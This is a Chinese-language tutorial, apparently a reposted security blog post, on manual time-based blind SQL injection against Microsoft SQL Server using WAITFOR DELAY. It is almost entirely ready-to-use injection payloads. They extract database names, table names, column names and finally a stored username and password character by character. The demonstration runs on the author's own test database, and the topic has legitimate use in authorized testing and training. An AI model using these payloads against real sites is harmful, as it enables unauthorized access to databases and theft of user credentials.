Microsoft SQL Server手注之延时型时间盲注
Microsoft SQL Server手注之延时型时间盲注
渗透攻击红队
发布于 2020-05-22 19:08:52
发布于 2020-05-22 19:08:52
延迟注入简介
延时函数 WAITFOR DELAY
WAITFOR是SQL Server中Transact-SQL提供的⼀个流程控制语句。它的作⽤就是等待特定时间,然后继续执⾏后 续的语句。它包含⼀个参数DELAY,⽤来指定等待的时间。
如果将该语句成功注⼊后,会造成数据库返回记录和 Web请求也会响应延迟特定的时间。由于该语句不涉及条件判断等情况,所以容易注⼊成功。根据Web请求是否有延迟,渗透测试⼈员就可以判断⽹站是否存在注⼊漏洞。同时,由于该语句并不返回特定内容,所以它也是盲注的重要检测⽅法。
语法:
WAITFOR DELAY '0:0:n'⽰例:
WAITFOR DELAY '0:0:4' -- 表⽰延迟4秒IF exists ()⼦句
语法:
IF exists () WAITFOR DELAY '0:0:5'手工延时注入
1.判断是否存在注⼊
WAITFOR DELAY '0:0:4'
2.猜测数据库名
猜测数据库名是否存在
if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
这条语句的意思呢是判断dibd=6的数据库是否存在!如果存在那么就延迟3秒返回!
根据dbid猜库名,先猜出长度
if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--
因为我数据库里只有两个我创建的数据库:test(dbid5)、saulgoodman(dbid6)
所以我就能用上面的语句来判断dbid5的长度是否为5,如果为5那么就延迟3秒返回!
同理猜解dbid6(saulgoodman)的长度可以用这条语句:
if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--
如果有多数据库那么就同理上面的语句以此类推就好了~
根据dbid查询挨个查询数据库名
因为我们dbid=4这个数据库是test,那么我们就可以来一个一个的猜解他的数据库名:
猜解第一个字符:t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
猜解第二个字符:e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
猜解第三个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第四个字符:t
如果想查询dbid6的数据库saulgoodman那么我们就直接改dbid号就好了:
猜解第一个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第二个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第三个字符:u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
猜解第四个字符:l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
猜解第五个字符:g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
猜解第六个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第七个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第八个字符:d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
猜解第九个字符:m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
猜解第十个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第十一个字符:n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--
3.猜解表名
因为我们知道了数据库名是test,然后我们就可以使用下面的语句来查询第一个表名的长度是否等于5(表名是users):
if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--
由上图可见,页面返回正常说明它的表名长度是5,那么我们就可以挨个猜解他的字符:users
猜解第一个字符:u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
猜解第五个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--
因为我们知道了数据库名是test,第一个表名是 users,然后我们就可以使用下面的语句来查询第二个表名的字符(表名是info):
猜解第一个字符:i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--
4.猜解列名
因为我们知道了表名是 users,那么我们可以猜解 users 表名下的列名:(列名是 username)
猜解第一个字符:u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
猜解第五个字符:n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
猜解第六个字符:a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
猜解第七个字符:m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
猜解第八个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--
这样就猜解出来了第一个列名,username!
第二种方式:我们有 id、username、password、age 四个列
获取第一列:(列名是id)
获取第一个字符:i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
获取第二个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--
获取第二列:(列名是username)
获取第一个字符:u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
获取第二个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
获取第三个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第四个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
获取第五个字符:n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
获取第六个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
获取第七个字符:m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
获取第八个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第三列:(列名是password)
获取第一个字符:p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
获取第二个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
获取第三个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
获取第四个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
获取第五个字符:w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
获取第六个字符:o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
获取第七个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
获取第八个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--
5.逐字猜解数据
我们知道了表名是:users,列名是:username、passwrd,那么我们就开始爆数据了:(saul)
判断username列第一个字符:s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
判断username列第二个字符:a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
判断username列第三个字符:u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
判断username列第四个字符:l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
这样就获取到了第一个用户名为:saul
获取 saul 的密码:(密码是saul520)
判断 password 列第一个字符:s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
判断 password 列第二个字符:a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
判断 password 列第三个字符:u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
判断 password 列第四个字符:l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
判断 password 列第五个字符:5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
判断 password 列第六个字符:2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
判断 password 列第七个字符:0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-04-03,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读